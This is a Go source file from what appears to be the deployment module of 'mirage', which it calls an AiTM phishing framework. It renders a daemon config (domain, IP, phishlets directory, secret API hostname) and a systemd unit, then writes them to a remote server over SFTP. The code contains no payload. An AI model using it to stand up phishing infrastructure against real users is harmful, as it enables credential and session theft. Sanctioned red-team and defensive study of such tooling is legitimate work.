package deploy

import (
	"bytes"
	"fmt"
	"os"
	"path"
	"text/template"

	"github.com/pkg/sftp"
	"golang.org/x/crypto/ssh"
)

const configTemplate = `# Auto-generated by mirage deploy — do not edit by hand.
# Re-run 'mirage deploy' to update.

domain: {{ .Domain }}
external_ipv4: {{ .ExternalIPv4 }}
https_port: {{ .HTTPSPort }}
dns_port: {{ .DNSPort }}
self_signed: true
data_dir: {{ .DataDir }}
phishlets_dir: {{ .PhishletsDir }}

api:
  secret_hostname: {{ .SecretHostname }}
`

const systemdUnitTemplate = `[Unit]
Description=Mirage AiTM phishing framework daemon
After=network-online.target
Wants=network-online.target

[Service]
Type=simple
ExecStart={{ .RemoteBinaryPath }} --config {{ .RemoteConfigDir }}/miraged.yaml
ExecReload=/bin/kill -HUP $MAINPID
Restart=on-failure
RestartSec=5s
LimitNOFILE=65536
NoNewPrivileges=true
ProtectSystem=strict
ReadWritePaths={{ .RemoteConfigDir }} /var/lib/mirage
AmbientCapabilities=CAP_NET_BIND_SERVICE

[Install]
WantedBy=multi-user.target
`

// render parses and executes a template string against cfg.
func render(name, tmplStr string, cfg Config) (string, error) {
	tmpl, err := template.New(name).Parse(tmplStr)
	if err != nil {
		return "", fmt.Errorf("parsing template %q: %w", name, err)
	}
	var buf bytes.Buffer
	if err := tmpl.Execute(&buf, cfg); err != nil {
		return "", fmt.Errorf("rendering template %q: %w", name, err)
	}
	return buf.String(), nil
}

// renderConfig renders the miraged.yaml config template with the given values.
func renderConfig(cfg Config) (string, error) {
	return render("config", configTemplate, cfg)
}

// renderSystemdUnit renders the systemd unit file content with the given values.
func renderSystemdUnit(cfg Config) (string, error) {
	return render("unit", systemdUnitTemplate, cfg)
}

// writeRemoteFile writes content to path on the remote host using SFTP.
func writeRemoteFile(client *ssh.Client, path, content string) error {
	sftpClient, err := sftp.NewClient(client)
	if err != nil {
		return fmt.Errorf("opening SFTP session: %w", err)
	}
	defer sftpClient.Close()
	f, err := sftpClient.OpenFile(path, os.O_WRONLY|os.O_CREATE|os.O_TRUNC)
	if err != nil {
		return fmt.Errorf("opening remote file %s: %w", path, err)
	}
	defer f.Close()
	_, err = f.Write([]byte(content))
	return err
}

// writeConfig renders the config template and writes it to the remote host.
func writeConfig(client *ssh.Client, cfg Config) error {
	content, err := renderConfig(cfg)
	if err != nil {
		return err
	}
	return writeRemoteFile(client, path.Join(cfg.RemoteConfigDir, "miraged.yaml"), content)
}

// writeSystemdUnit writes the systemd unit file to /etc/systemd/system/miraged.service.
func writeSystemdUnit(client *ssh.Client, cfg Config) error {
	content, err := renderSystemdUnit(cfg)
	if err != nil {
		return err
	}
	return writeRemoteFile(client, "/etc/systemd/system/miraged.service", content)
}
